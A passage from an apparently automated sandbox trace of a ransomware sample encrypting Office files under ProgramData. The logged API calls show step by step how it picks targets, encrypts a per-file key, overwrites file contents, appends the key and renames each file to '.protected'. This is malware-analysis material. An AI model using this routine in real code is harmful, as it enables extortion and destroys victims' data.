(lpString1="MSOINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0069.628] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 [0069.628] StrStrIW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0069.628] lstrcmpW (lpString1="MSOINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.628] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.628] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.628] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.628] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 [0069.628] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0069.628] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 [0069.629] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0069.629] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 [0069.629] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0069.629] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.647] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.647] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.648] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.648] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.662] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.662] CloseHandle (hObject=0xd8) returned 1 [0069.662] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.protected") returned 82 [0069.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.protected")) returned 1 [0069.663] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.663] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 [0069.663] StrStrIW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.663] lstrcmpW (lpString1="OMSINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.663] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.663] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.663] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.664] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 [0069.664] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0069.664] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 [0069.664] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0069.664] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 [0069.664] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0069.664] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.674] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.675] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.675] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.675] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.676] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.677] CloseHandle (hObject=0xd8) returned 1 [0069.677] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.protected") returned 81 [0069.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.protected")) returned 1 [0069.678] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.678] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0069.678] StrStrIW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.678] lstrcmpW (lpString1="ONINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.678] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.678] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.678] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.679] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0069.679] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0069.679] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0069.679] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0069.679] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0069.679] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0069.679] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.714] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.714] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.714] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.714] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.750] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.750] CloseHandle (hObject=0xd8) returned 1 [0069.751] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.protected") returned 80 [0069.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.protected")) returned 1 [0069.752] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Windows") returned -1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0069.752] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0069.752] StrStrIW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0069.752] lstrcmpW (lpString1="ONINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.752] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.752] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.752] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.752] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0069.752] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0069.752] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0069.752] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0069.752] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0069.752] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0069.753] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.754] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.754] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.764] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.764] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.984] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.984] CloseHandle (hObject=0xd8) returned 1 [0069.984] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.protected") returned 81 [0069.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.protected")) returned 1 [0069.985] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Windows") returned -1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.985] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0069.985] StrStrIW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.985] lstrcmpW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.985] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.985] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.985] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.028] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0070.074] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.074] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0070.074] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.074] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0070.074] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.075] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.090] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.090] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.091] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.091] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.106] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.106] CloseHandle (hObject=0xd8) returned 1 [0070.107] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.protected") returned 82 [0070.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.protected")) returned 1 [0070.108] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Windows") returned -1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Program Files") returned -1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="System Volume Information") returned -1 [0070.108] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0070.108] StrStrIW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.108] lstrcmpW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.108] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.108] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.108] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.108] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0070.108] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.108] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0070.108] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.108] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0070.108] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.108] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.127] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.127] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.127] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.128] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.141] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, 